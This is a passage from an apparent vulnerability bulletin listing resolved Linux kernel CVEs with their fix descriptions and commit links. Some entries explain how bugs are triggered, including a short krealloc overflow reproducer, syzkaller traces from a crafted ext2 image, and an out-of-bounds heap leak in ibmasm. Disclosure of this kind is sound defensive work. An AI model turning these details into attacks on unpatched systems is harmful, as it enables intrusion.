| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Fix memory leak in amdgpu_ras_init() When amdgpu_nbio_ras_sw_init() fails in amdgpu_ras_init(), the function returns directly without freeing the allocated con structure, leading to a memory leak. Fix this by jumping to the release_con label to properly clean up the allocated memory before returning the error code. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45976 | https://git.kernel.org/stable/c/f8a5426652bdadd4a5cb48326d48abbdfebe8153 https://git.kernel.org/stable/c/c11cd77a18115d2cd3f4b6915c4a537b6042f950 https://git.kernel.org/stable/c/2fef8c2ac67e7c1b0409d23653300b134c63e54c https://git.kernel.org/stable/c/3f43e7812b30d6b2e850218f9bb1dae60727fcef https://git.kernel.org/stable/c/ee41e5b63c8210525c936ee637a2c8d185ce873c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbnic: close fw_log race between users and teardown Fixes a theoretical race on fw_log between the teardown path and fw_log write functions. fw_log is written inside fbnic_fw_log_write() and can be reached from the mailbox handler fbnic_fw_msix_intr(), but fw_log is freed before IRQ/MBX teardown during cleanup, resulting in a potential data race of dereferencing a freed/null variable. Possible Interleaving Scenario: CPU0: fbnic_fw_msix_intr() // Entry fbnic_fw_log_write() if (fbnic_fw_log_ready()) // true ... preempt ... CPU1: fbnic_remove() // Entry fbnic_fw_log_free() vfree(log->data_start); log->data_start = NULL; CPU0: continues, walks log->entries or writes to log->data_start The initialization also has an incorrect order problem, as the fw_log is currently allocated after MBX setup during initialization. Fix the problems by adjusting the synchronization order to put initialization in place before the mailbox is enabled, and not cleared until after the mailbox has been disabled. | 2026-05-27 | not yet calculated | CVE-2026-45977 | https://git.kernel.org/stable/c/223cfef4812bdfa5ac5c1aa761cdba03cfe2c9cd https://git.kernel.org/stable/c/5f10ab3643c58a22fbaee92c4701b00fcb4a465d https://git.kernel.org/stable/c/ee5492fd88cfc079c19fbeac78e9e53b7f6c04f3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: greybus: lights: avoid NULL deref gb_lights_light_config() stores channel_count before allocating the channels array. If kcalloc() fails, gb_lights_release() iterates the non-zero count and dereferences light->channels, which is NULL. Allocate channels first and only then publish channels_count so the cleanup path can't walk a NULL pointer. | 2026-05-27 | not yet calculated | CVE-2026-45978 | https://git.kernel.org/stable/c/a118724d7641b832fa14323e2733e28ae4834552 https://git.kernel.org/stable/c/3cbe694d235d96f628ec7dc6ae4d8bdddb768699 https://git.kernel.org/stable/c/ba5022162da63059bae36c4fd84d7031f582c71f https://git.kernel.org/stable/c/65f2c608096d766540953d9b170d216aa3b5eb95 https://git.kernel.org/stable/c/01b91cb3e748032fd96bbe0043812b426a52f091 https://git.kernel.org/stable/c/06162d85f830582da6e9e5fcf9c9504d6da9ae0b https://git.kernel.org/stable/c/da46264a7016034a5bbbad034c012ef218b7d0af https://git.kernel.org/stable/c/efcffd9a6ad8d190651498d5eda53bfc7cf683a7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: clean up the amdgpu_cs_parser_bos In low memory conditions, kmalloc can fail. In such conditions unlock the mutex for a clean exit. We do not need to amdgpu_bo_list_put as it's been handled in the amdgpu_cs_parser_fini. | 2026-05-27 | not yet calculated | CVE-2026-45979 | https://git.kernel.org/stable/c/0905a1d4a5500ecf11f1c0079098e3a351d22163 https://git.kernel.org/stable/c/f025a2b8d93358467b8e8f4b3a617e88c5f02fab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/cio: Fix device lifecycle handling in css_alloc_subchannel() `css_alloc_subchannel()` calls `device_initialize()` before setting up the DMA masks. If `dma_set_coherent_mask()` or `dma_set_mask()` fails, the error path frees the subchannel structure directly, bypassing the device model reference counting. Once `device_initialize()` has been called, the embedded struct device must be released via `put_device()`, allowing the release callback to free the container structure. Fix the error path by dropping the initial device reference with `put_device()` instead of calling `kfree()` directly. This ensures correct device lifetime handling and avoids potential use-after-free or double-free issues. | 2026-05-27 | not yet calculated | CVE-2026-45981 | https://git.kernel.org/stable/c/2b2ad7ad4a28ffdb9f94e6d979b88a5b12b71681 https://git.kernel.org/stable/c/b1d4e6fb241672850296956c4d782a69363a3807 https://git.kernel.org/stable/c/fd295a75d828c11acfcc6869c2a12cdaaf9b7722 https://git.kernel.org/stable/c/abb6e07f46a740cda4f07d1b561ae4eaa7a1df42 https://git.kernel.org/stable/c/f96c5ccf95ae5f27218c1ce2d6a3ad2d3e105424 https://git.kernel.org/stable/c/6715560527e343a387e4a0d2e6c401748e89fa55 https://git.kernel.org/stable/c/c35cfbb5341ba05ad1b4476ffc3c21cc3ff8f603 https://git.kernel.org/stable/c/f65c75b0b9b5a390bc3beadcde0a6fbc3ad118f7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ACPICA: Fix NULL pointer dereference in acpi_ev_address_space_dispatch() Cover a missed execution path with a new check. | 2026-05-27 | not yet calculated | CVE-2026-45982 | https://git.kernel.org/stable/c/7d99cbe717c1b15a66559215df32312d8cf7e525 https://git.kernel.org/stable/c/f2cf475d23b8486dfa414f7ac09f918ffd3c32a5 https://git.kernel.org/stable/c/cce354524da4d10fd2c7eb835e2e4e8ab8c0ce97 https://git.kernel.org/stable/c/b24595b86920911d2b04f862422b896a0620e9ad https://git.kernel.org/stable/c/56024dbe8c76cff22f53ba81a95d9efd4d0c9c44 https://git.kernel.org/stable/c/f851e03bce968ff9b3faad1b616062e1244fd38d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfsd: never defer requests during idmap lookup During v4 request compound arg decoding, some ops (e.g. SETATTR) can trigger idmap lookup upcalls. When those upcall responses get delayed beyond the allowed time limit, cache_check() will mark the request for deferral and cause it to be dropped. This prevents nfs4svc_encode_compoundres from being executed, and thus the session slot flag NFSD4_SLOT_INUSE never gets cleared. Subsequent client requests will fail with NFSERR_JUKEBOX, given that the slot will be marked as in-use, making the SEQUENCE op fail. Fix this by making sure that the RQ_USEDEFERRAL flag is always clear during nfs4svc_decode_compoundargs(), since no v4 request should ever be deferred. | 2026-05-27 | not yet calculated | CVE-2026-45983 | https://git.kernel.org/stable/c/b9abb760db20504240a7147f27934d900cd80b23 https://git.kernel.org/stable/c/3a72c7dedc99b321e0f267e4e999e5baf07c4593 https://git.kernel.org/stable/c/99e17b20fddac19a228d213e00f6b9e1c10daff9 https://git.kernel.org/stable/c/243f71ed873ff3feeb6f9b5cb145d63f7188b4c4 https://git.kernel.org/stable/c/063a6f22478ef929625000a2caf54667725c1dfd https://git.kernel.org/stable/c/d75ec4504a4340b033b15cad0303988b3089dd93 https://git.kernel.org/stable/c/8dff54fe88c0dcd4c55bff9fc2fa6ca968290826 https://git.kernel.org/stable/c/f9c206cdc4266caad6a9a7f46341420a10f03ccb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: don't set EXT4_GET_BLOCKS_CONVERT when splitting before submitting I/O When allocating blocks during within-EOF DIO and writeback with dioread_nolock enabled, EXT4_GET_BLOCKS_PRE_IO was set to split an existing large unwritten extent. However, EXT4_GET_BLOCKS_CONVERT was set when calling ext4_split_convert_extents(), which may potentially result in stale data issues. Assume we have an unwritten extent, and then DIO writes the second half. [UUUUUUUUUUUUUUUU] on-disk extent U: unwritten extent [UUUUUUUUUUUUUUUU] extent status tree |<- ->| ----> dio write this range First, ext4_iomap_alloc() call ext4_map_blocks() with EXT4_GET_BLOCKS_PRE_IO, EXT4_GET_BLOCKS_UNWRIT_EXT and EXT4_GET_BLOCKS_CREATE flags set. ext4_map_blocks() find this extent and call ext4_split_convert_extents() with EXT4_GET_BLOCKS_CONVERT and the above flags set. Then, ext4_split_convert_extents() calls ext4_split_extent() with EXT4_EXT_MAY_ZEROOUT, EXT4_EXT_MARK_UNWRIT2 and EXT4_EXT_DATA_VALID2 flags set, and it calls ext4_split_extent_at() to split the second half with EXT4_EXT_DATA_VALID2, EXT4_EXT_MARK_UNWRIT1, EXT4_EXT_MAY_ZEROOUT and EXT4_EXT_MARK_UNWRIT2 flags set. However, ext4_split_extent_at() failed to insert extent since a temporary lack -ENOSPC. It zeroes out the first half but convert the entire on-disk extent to written since the EXT4_EXT_DATA_VALID2 flag set, but left the second half as unwritten in the extent status tree. [0000000000SSSSSS] data S: stale data, 0: zeroed [WWWWWWWWWWWWWWWW] on-disk extent W: written extent [WWWWWWWWWWUUUUUU] extent status tree Finally, if the DIO failed to write data to the disk, the stale data in the second half will be exposed once the cached extent entry is gone. Fix this issue by not passing EXT4_GET_BLOCKS_CONVERT when splitting an unwritten extent before submitting I/O, and make ext4_split_convert_extents() to zero out the entire extent range to zero for this case, and also mark the extent in the extent status tree for consistency. | 2026-05-27 | not yet calculated | CVE-2026-45985 | https://git.kernel.org/stable/c/77e407967cd872cd75d7e4a691908e49c8e6b4d4 https://git.kernel.org/stable/c/37555690f39f78ef69af347d9aff897e07445949 https://git.kernel.org/stable/c/67cdb7bd7442bd3cdc6d6088bbb2df9be2fe936c https://git.kernel.org/stable/c/2920ec61c98b9476781359f05b94da84e80f54d4 https://git.kernel.org/stable/c/2698731d25823267c29190cb578da9296a0c0d7b https://git.kernel.org/stable/c/716e7439a5a9b18c3ff882c2f8c834b9ced1aaec https://git.kernel.org/stable/c/feaf2a80e78f89ee8a3464126077ba8683b62791 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: ccree - fix a memory leak in cc_mac_digest() Add cc_unmap_result() if cc_map_hash_request_final() fails to prevent potential memory leak. | 2026-05-27 | not yet calculated | CVE-2026-45986 | https://git.kernel.org/stable/c/3061c9bfb3f5b3522ab174e2fa7473b24422d1c6 https://git.kernel.org/stable/c/22f1dd4ca3bfe77db52cc7df3cc353dc114aab8b https://git.kernel.org/stable/c/910f335786a0a0f0b46c3c8c19a13d25cb4454b6 https://git.kernel.org/stable/c/502440c235fe34cee02b24d7f893841f7565b3bc https://git.kernel.org/stable/c/02c64052fad03699b9c6d1df2f9b444d17e4ac50 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: nSVM: Sync interrupt shadow to cached vmcb12 after VMRUN of L2 After VMRUN in guest mode, nested_sync_control_from_vmcb02() syncs fields written by the CPU from vmcb02 to the cached vmcb12. This is because the cached vmcb12 is used as the authoritative copy of some of the controls, and is the payload when saving/restoring nested state. int_state is also written by the CPU, specifically bit 0 (i.e. SVM_INTERRUPT_SHADOW_MASK) for nested VMs, but it is not sync'd to cached vmcb12. This does not cause a problem if KVM_SET_NESTED_STATE preceeds KVM_SET_VCPU_EVENTS in the restore path, as an interrupt shadow would be correctly restored to vmcb02 (KVM_SET_VCPU_EVENTS overwrites what KVM_SET_NESTED_STATE restored in int_state). However, if KVM_SET_VCPU_EVENTS preceeds KVM_SET_NESTED_STATE, an interrupt shadow would be restored into vmcb01 instead of vmcb02. This would mostly be benign for L1 (delays an interrupt), but not for L2. For L2, the vCPU could hang (e.g. if a wakeup interrupt is delivered before a HLT that should have been in an interrupt shadow). Sync int_state to the cached vmcb12 in nested_sync_control_from_vmcb02() to avoid this problem. With that, KVM_SET_NESTED_STATE restores the correct interrupt shadow state, and if KVM_SET_VCPU_EVENTS follows it would overwrite it with the same value. | 2026-05-27 | not yet calculated | CVE-2026-45987 | https://git.kernel.org/stable/c/1709418535a8df95532999d61b03d59975280258 https://git.kernel.org/stable/c/2f950eeb27af6885416232761700b8820cae0a61 https://git.kernel.org/stable/c/497f6af9679fc9c6ce2f438e11ed5d51b1aa8297 https://git.kernel.org/stable/c/e0377e52f3c10ee572732d11b04625b7f517a862 https://git.kernel.org/stable/c/03bee264f8ebfd39e0254c98e112d033a7aa9055 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: of: unittest: fix use-after-free in testdrv_probe() The function testdrv_probe() retrieves the device_node from the PCI device, applies an overlay, and then immediately calls of_node_put(dn). This releases the reference held by the PCI core, potentially freeing the node if the reference count drops to zero. Later, the same freed pointer 'dn' is passed to of_platform_default_populate(), leading to a use-after-free. The reference to pdev->dev.of_node is owned by the device model and should not be released by the driver. Remove the erroneous of_node_put() to prevent premature freeing. | 2026-05-27 | not yet calculated | CVE-2026-45989 | https://git.kernel.org/stable/c/0ba03e06f037df704d9b032e36d417633e2326bc https://git.kernel.org/stable/c/d68347b07b9801791c9eaab8f772770b52b8cd5c https://git.kernel.org/stable/c/5b6122a67a295f8a08b7c18d908a1bd974dfaec8 https://git.kernel.org/stable/c/6b2023286d2c6ed3bf964fb92e34c9c14d42eb69 https://git.kernel.org/stable/c/07fd339b2c253205794bea5d9b4b7548a4546c56 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: slub: fix data loss and overflow in krealloc() Commit 2cd8231796b5 ("mm/slub: allow to set node and align in k[v]realloc") introduced the ability to force a reallocation if the original object does not satisfy new alignment or NUMA node, even when the object is being shrunk. This introduced two bugs in the reallocation fallback path: 1. Data loss during NUMA migration: The jump to 'alloc_new' happens before 'ks' and 'orig_size' are initialized. As a result, the memcpy() in the 'alloc_new' block would copy 0 bytes into the new allocation. 2. Buffer overflow during shrinking: When shrinking an object while forcing a new alignment, 'new_size' is smaller than the old size. However, the memcpy() used the old size ('orig_size ?: ks'), leading to an out-of-bounds write. The same overflow bug exists in the kvrealloc() fallback path, where the old bucket size ksize(p) is copied into the new buffer without being bounded by the new size. A simple reproducer: // e.g. add to lkdtm as KREALLOC_SHRINK_OVERFLOW while (1) { void *p = kmalloc(128, GFP_KERNEL); p = krealloc_node_align(p, 64, 256, GFP_KERNEL, NUMA_NO_NODE); kfree(p); } demonstrates the issue: ================================================================== BUG: KFENCE: out-of-bounds write in memcpy_orig+0x68/0x130 Out-of-bounds write at 0xffff8883ad757038 (120B right of kfence-#47): memcpy_orig+0x68/0x130 krealloc_node_align_noprof+0x1c8/0x340 lkdtm_KREALLOC_SHRINK_OVERFLOW+0x8c/0xc0 [lkdtm] lkdtm_do_action+0x3a/0x60 [lkdtm] ... kfence-#47: 0xffff8883ad756fc0-0xffff8883ad756fff, size=64, cache=kmalloc-64 allocated by task 316 on cpu 7 at 97.680481s (0.021813s ago): krealloc_node_align_noprof+0x19c/0x340 lkdtm_KREALLOC_SHRINK_OVERFLOW+0x8c/0xc0 [lkdtm] lkdtm_do_action+0x3a/0x60 [lkdtm] ... ================================================================== Fix it by moving the old size calculation to the top of __do_krealloc() and bounding all copy lengths by the new allocation size. | 2026-05-27 | not yet calculated | CVE-2026-45990 | https://git.kernel.org/stable/c/38387ccc0fbe38d14fb4c2ad7ee1d7404e5e59fd https://git.kernel.org/stable/c/550fa6b5aabb096554536ac1e3ec96b76cbb35fd https://git.kernel.org/stable/c/082a6d03a2d685a83a332666b500ad3966349588 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: caiaq: Fix potentially leftover ep1_in_urb at error path The previous fix for handling the error from setup_card() missed that an internal URB cdev->ep1_in_urb might have been already submitted beforehand. In the normal case, this URB gets killed at the disconnection, but in the error path, we didn't do it, hence there can be a potential leak. Fix it in the error path for setup_card(), too. | 2026-05-27 | not yet calculated | CVE-2026-45992 | https://git.kernel.org/stable/c/be62c8bb03b6aec3790a943d4a7567d4d73b8be9 https://git.kernel.org/stable/c/e0fb842af7052f0ab9e709db0c59300aa4051fc0 https://git.kernel.org/stable/c/1d160e30aa42b7c41163e51366bb34432367260d https://git.kernel.org/stable/c/438ab932dc6fef5b001dfeba08a18a491edc8f7b https://git.kernel.org/stable/c/0a7b5221b5b51cc798fcfc3be00d02eade149d69 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: LoongArch: Add spectre boundry for syscall dispatch table The LoongArch syscall number is directly controlled by userspace, but does not have a array_index_nospec() boundry to prevent access past the syscall function pointer tables. | 2026-05-27 | not yet calculated | CVE-2026-45993 | https://git.kernel.org/stable/c/108f2cd13577a410c0ad6ea00708596d9d0dfc90 https://git.kernel.org/stable/c/07040904ad217545be096d4280ed33c02f6a3750 https://git.kernel.org/stable/c/85cbf7fb568af5358aae61925c4e66b8f5e1439d https://git.kernel.org/stable/c/bc84a109c2082dd0c4b38e8d923c046b41977533 https://git.kernel.org/stable/c/0c965d2784fbbd7f8e3b96d875c9cfdf7c00da3d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ibmasm: fix OOB reads in command_file_write due to missing size checks The command_file_write() handler allocates a kernel buffer of exactly count bytes and copies user data into it, but does not validate the buffer against the dot command protocol before passing it to get_dot_command_size() and get_dot_command_timeout(). Since both the allocation size (count) and the header fields (command_size, data_size) are independently user-controlled, an attacker can cause get_dot_command_size() to return a value exceeding the allocation, triggering OOB reads in get_dot_command_timeout() and an out-of-bounds memcpy_toio() that leaks kernel heap memory to the service processor. Fix with two guards: reject writes smaller than sizeof(struct dot_command_header) before allocation, then after copying user data reject commands where the buffer is smaller than the total size declared by the header (sizeof(header) + command_size + data_size). This ensures all subsequent header and payload field accesses stay within the buffer. | 2026-05-27 | not yet calculated | CVE-2026-45994 | https://git.kernel.org/stable/c/a672682d39dd34e2b5ba4feb436723bed65125ff https://git.kernel.org/stable/c/aefc1a97da17d8309974690c8a03e439a91ebb1c https://git.kernel.org/stable/c/ee5737891464030a189837467df3b81a273718ad https://git.kernel.org/stable/c/d0fb4d1dc43f8d5179917a2daaa82680993d4cdf https://git.kernel.org/stable/c/0eb09f737428e482a32a2e31e5e223f2b35a71d3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/zcrx: fix user_struct uaf io_free_rbuf_ring() usees a struct user_struct, which io_zcrx_ifq_free() puts it down before destroying the ring. | 2026-05-27 | not yet calculated | CVE-2026-45995 | https://git.kernel.org/stable/c/9feb88eeda6d288f93fcfb6bca563f89e316479d https://git.kernel.org/stable/c/0fcccfd87152f957fa8312b841f6efef42a05a20 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: imx: fix use-after-free on unbind The SPI subsystem frees the controller and any subsystem allocated driver data as part of deregistration (unless the allocation is device managed). Take another reference before deregistering the controller so that the driver data is not freed until the driver is done with it. | 2026-05-27 | not yet calculated | CVE-2026-45996 | https://git.kernel.org/stable/c/f99165ef067723221472ce1aff632bc74f562643 https://git.kernel.org/stable/c/385a330083f8dd47c15b02e9a83aef9234a37003 https://git.kernel.org/stable/c/132e47030b0b5e398e0da6c59df5a5dae9b52cff https://git.kernel.org/stable/c/aa9025a498036b6012769f7af36d421385386c17 https://git.kernel.org/stable/c/1c78c2002380a1fe31bfb01a3d5f29809e55a096 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: sd: fix missing put_disk() when device_add(&disk_dev) fails If device_add(&sdkp->disk_dev) fails, put_device() runs scsi_disk_release(), which frees the scsi_disk but leaves the gendisk referenced. The device_add_disk() error path in sd_probe() calls put_disk(gd); call put_disk(gd) here to mirror that cleanup. | 2026-05-27 | not yet calculated | CVE-2026-45997 | https://git.kernel.org/stable/c/262152ec37101f9dc524743ccdbd6c7641d14573 https://git.kernel.org/stable/c/b64b4f499801b12d0e2785447e4df6c164c608a9 https://git.kernel.org/stable/c/13e550fbfccdb311e76ec96892dfe35f0dba0657 https://git.kernel.org/stable/c/a95d38c5701431bfc826e7b18acc0785919d5c88 https://git.kernel.org/stable/c/1e111c4b3a726df1254670a5cc4868cedb946d37 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix potential UAF after skb_unshare() failure If skb_unshare() fails to unshare a packet due to allocation failure in rxrpc_input_packet(), the skb pointer in the parent (rxrpc_io_thread()) will be NULL'd out. This will likely cause the call to trace_rxrpc_rx_done() to oops. Fix this by moving the unsharing down to where rxrpc_input_call_event() calls rxrpc_input_call_packet(). There are a number of places prior to that where we ignore DATA packets for a variety of reasons (such as the call already being complete) for which an unshare is then avoided. And with that, rxrpc_input_packet() doesn't need to take a pointer to the pointer to the packet, so change that to just a pointer. | 2026-05-27 | not yet calculated | CVE-2026-45998 | https://git.kernel.org/stable/c/e3bf143b1e98fb3d6d9e6825bcd683974d478e8c https://git.kernel.org/stable/c/bf20f46d94f1db38e6ffc0ca204a5fe0de01b495 https://git.kernel.org/stable/c/996b0487b3cdda4c91811dbb1c9564626bc840bd https://git.kernel.org/stable/c/8fde6296c4d4da2be7ab761305ab7f232b94eefd https://git.kernel.org/stable/c/1f2740150f904bfa60e4bad74d65add3ccb5e7f8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix conn-level packet handling to unshare RESPONSE packets The security operations that verify the RESPONSE packets decrypt bits of it in place - however, the sk_buff may be shared with a packet sniffer, which would lead to the sniffer seeing an apparently corrupt packet (actually decrypted). Fix this by handing a copy of the packet off to the specific security handler if the packet was cloned. | 2026-05-27 | not yet calculated | CVE-2026-46000 | https://git.kernel.org/stable/c/c0428a22daf69714dc042b67ea759956b74c74e5 https://git.kernel.org/stable/c/98a2046d155f73f6cf5d2c493c5e09b4963e2e12 https://git.kernel.org/stable/c/ca71ac2de389b01eecdc48bfafbdf073ec232044 https://git.kernel.org/stable/c/d9b93a0f57ca5f6831bfaa34014b6cd705564a00 https://git.kernel.org/stable/c/24481a7f573305706054c59e275371f8d0fe919f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwmon: (pt5161l) Fix bugs in pt5161l_read_block_data() Fix two bugs in pt5161l_read_block_data(): 1. Buffer overrun: The local buffer rbuf is declared as u8 rbuf[24], but i2c_smbus_read_block_data() can return up to I2C_SMBUS_BLOCK_MAX (32) bytes. The i2c-core copies the data into the caller's buffer before the return value can be checked, so the post-read length validation does not prevent a stack overrun if a device returns more than 24 bytes. Resize the buffer to I2C_SMBUS_BLOCK_MAX. 2. Unexpected positive return on length mismatch: When all three retries are exhausted because the device returns data with an unexpected length, i2c_smbus_read_block_data() returns a positive byte count. The function returns this directly, and callers treat any non-negative return as success, processing stale or incomplete buffer contents. Return -EIO when retries are exhausted with a positive return value, preserving the negative error code on I2C failure. | 2026-05-27 | not yet calculated | CVE-2026-46001 | https://git.kernel.org/stable/c/7eccabff1c9ec15e4b6fe186d5c147b13a9cdb4e https://git.kernel.org/stable/c/95d48e37a1304d6148406c799479c0fb505aefa7 https://git.kernel.org/stable/c/a11aa9c5fd9dfe62be7cfec1f2a7546afb77254c https://git.kernel.org/stable/c/24c73e93d6a756e1b8626bb259d2e07c5b89b370 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext2: reject inodes with zero i_nlink and valid mode in ext2_iget() ext2_iget() already rejects inodes with i_nlink == 0 when i_mode is zero or i_dtime is set, treating them as deleted. However, the case of i_nlink == 0 with a non-zero mode and zero dtime slips through. Since ext2 has no orphan list, such a combination can only result from filesystem corruption - a legitimate inode deletion always sets either i_dtime or clears i_mode before freeing the inode. A crafted image can exploit this gap to present such an inode to the VFS, which then triggers WARN_ON inside drop_nlink() (fs/inode.c) via ext2_unlink(), ext2_rename() and ext2_rmdir(): WARNING: CPU: 3 PID: 609 at fs/inode.c:336 drop_nlink+0xad/0xd0 fs/inode.c:336 CPU: 3 UID: 0 PID: 609 Comm: syz-executor Not tainted 6.12.77+ #1 Call Trace: <TASK> inode_dec_link_count include/linux/fs.h:2518 [inline] ext2_unlink+0x26c/0x300 fs/ext2/namei.c:295 vfs_unlink+0x2fc/0x9b0 fs/namei.c:4477 do_unlinkat+0x53e/0x730 fs/namei.c:4541 __x64_sys_unlink+0xc6/0x110 fs/namei.c:4587 do_syscall_64+0xf5/0x220 arch/x86/entry/common.c:78 entry_SYSCALL_64_after_hwframe+0x77/0x7f </TASK> WARNING: CPU: 0 PID: 646 at fs/inode.c:336 drop_nlink+0xad/0xd0 fs/inode.c:336 CPU: 0 UID: 0 PID: 646 Comm: syz.0.17 Not tainted 6.12.77+ #1 Call Trace: <TASK> inode_dec_link_count include/linux/fs.h:2518 [inline] ext2_rename+0x35e/0x850 fs/ext2/namei.c:374 vfs_rename+0xf2f/0x2060 fs/namei.c:5021 do_renameat2+0xbe2/0xd50 fs/namei.c:5178 __x64_sys_rename+0x7e/0xa0 fs/namei.c:5223 do_syscall_64+0xf5/0x220 arch/x86/entry/common.c:78 entry_SYSCALL_64_after_hwframe+0x77/0x7f </TASK> WARNING: CPU: 0 PID: 634 at fs/inode.c:336 drop_nlink+0xad/0xd0 fs/inode.c:336 CPU: 0 UID: 0 PID: 634 Comm: syz-executor Not tainted 6.12.77+ #1 Call Trace: <TASK> inode_dec_link_count include/linux/fs.h:2518 [inline] ext2_rmdir+0xca/0x110 fs/ext2/namei.c:311 vfs_rmdir+0x204/0x690 fs/namei.c:4348 do_rmdir+0x372/0x3e0 fs/namei.c:4407 __x64_sys_unlinkat+0xf0/0x130 fs/namei.c:4577 do_syscall_64+0xf5/0x220 arch/x86/entry/common.c:78 entry_SYSCALL_64_after_hwframe+0x77/0x7f </TASK> Extend the existing i_nlink == 0 check to also catch this case, reporting the corruption via ext2_error() and returning -EFSCORRUPTED. This rejects the inode at load time and prevents it from reaching any of the namei.c paths. Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2026-05-27 | not yet calculated | CVE-2026-46002 | https://git.kernel.org/stable/c/32e0b925572686399243834ec99e2a9d85c62eae https://git.kernel.org/stable/c/d3af04a43db86379df7438bf8bade71685b8a239 https://git.kernel.org/stable/c/2dde6377ab2e46bb80cf066c659ef016f3ad7a9b https://git.kernel.org/stable/c/470264bbec499e276a89a6431144ae58f411ea4d https://git.kernel.org/stable/c/25947cc5b2374cd5bf627fe3141496444260d04f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: qrtr: ns: Limit the total number of nodes Currently, the nameserver doesn't limit the number of nodes it handles. This can be an attack vector if a malicious client starts registering random nodes, leading to memory exhaustion. Hence, limit the maximum number of nodes to 64. Note that, limit of 64 is chosen based on the current platform requirements. If requirement changes in the future, this limit can be increased. | 2026-05-27 | not yet calculated | CVE-2026-46003 | https://git.kernel.org/stable/c/4c46413661431aa60fb134cd4ecdf8beaa39f824 https://git.kernel.org/stable/c/4665a29c08e1b36bc9db4814f9dde3d23e8fd1b0 https://git.kernel.org/stable/c/5cf6d5e5e3b804a44692fbf548a5179442e2e923 https://git.kernel.org/stable/c/8022876894d09ae485b499058c3357da683bcc5d https://git.kernel.org/stable/c/27d5e84e810b0849d08b9aec68e48570461ce313 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: caiaq: Handle probe errors properly The probe procedure of setup_card() in caiaq driver doesn't treat the error cases gracefully, e.g. the error from snd_card_register() calls snd_card_free() but continues. This would lead to a UAF for the further calls like snd_usb_caiaq_control_init(), as Berk suggested in another patch in the link below. However, the problem is not only that; in general, this function drops the all error handlings (as it's a void function) although its caller can propagate an error to snd_probe(), which eventually calls snd_card_free() as a proper error path. That said, we should treat each error case in setup_card(), and just return the error code promptly, which is then handled later as a fatal error in snd_probe(). This patch achieves it by changing the setup_card() to return an error code. Also, the superfluous snd_card_free() call is removed, too. Note that card->private_free can be set still safely at returning an error. All called functions in card_free() have checks of the unassigned resources or NULL checks. | 2026-05-27 | not yet calculated | CVE-2026-46004 | https://git.kernel.org/stable/c/f537e3ad69609f6924a4db6b4a7f6561f5288bdd https://git.kernel.org/stable/c/6251e3e256337a30160ef59ab1580dde4d1acd28 https://git.kernel.org/stable/c/e59ecd4ee3a450db6cb4e4ecaa3efdd593f80056 https://git.kernel.org/stable/c/096dd8519cf2f768e9e14f224b627f7aaee1a9c5 https://git.kernel.org/stable/c/28abd224db4a49560b452115bca3672a20e45b2f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfs: fix a resource leak in xfs_alloc_buftarg() In the error path, call fs_put_dax() to drop the DAX device reference. | 2026-05-27 | not yet calculated | CVE-2026-46005 | https://git.kernel.org/stable/c/82fb9da6477d08bdab954dc7bc081a41f2f9cae6 https://git.kernel.org/stable/c/28a6c132b8c6e5eeefa889c4fb43d65b12989d48 https://git.kernel.org/stable/c/5c293a1e1ef0f838772d20ae8afae4cbd87cd3f9 https://git.kernel.org/stable/c/5804cb507233ed767a83ac70527b2f6c4566ec75 https://git.kernel.org/stable/c/29a7b2614357393b176ef06ba5bc3ff5afc8df69 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwmon: (powerz) Avoid cacheline sharing for DMA buffer Depending on the architecture the transfer buffer may share a cacheline with the following mutex. As the buffer may be used for DMA, that is problematic. Use the high-level DMA helpers to make sure that cacheline sharing can not happen. Also drop the comment, as the helpers are documentation enough. https://sashiko.dev/#/message/20260408175814.934BFC19421%40smtp.kernel.org | 2026-05-27 | not yet calculated | CVE-2026-46007 | https://git.kernel.org/stable/c/270e5c576a6e30f6b337fa91d35b44c241297533 https://git.kernel.org/stable/c/1869da3efe703b016b23d4885f3fe6c1751959c6 https://git.kernel.org/stable/c/2fa2273016a0483217404cfe330967c4ac6832a9 https://git.kernel.org/stable/c/3023c050af3600bf451153335dea5e073c9a3088 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: fix damos_walk() vs kdamond_fn() exit race When kdamond_fn() main loop is finished, the function cancels remaining damos_walk() request and unset the damon_ctx->kdamond so that API callers and API functions themselves can show the context is terminated. damos_walk() adds the caller's request to the queue first. After that, it shows if the kdamond of the damon_ctx is still running (damon_ctx->kdamond is set). Only if the kdamond is running, damos_walk() starts waiting for the kdamond's handling of the newly added request. The damos_walk() requests registration and damon_ctx->kdamond unset are protected by different mutexes, though. Hence, damos_walk() could race with damon_ctx->kdamond unset, and result in deadlocks. For example, let's suppose kdamond successfully finished the damow_walk() request cancelling. Right after that, damos_walk() is called for the context. It registers the new request, and shows the context is still running, because damon_ctx->kdamond unset is not yet done. Hence the damos_walk() caller starts waiting for the handling of the request. However, the kdamond is 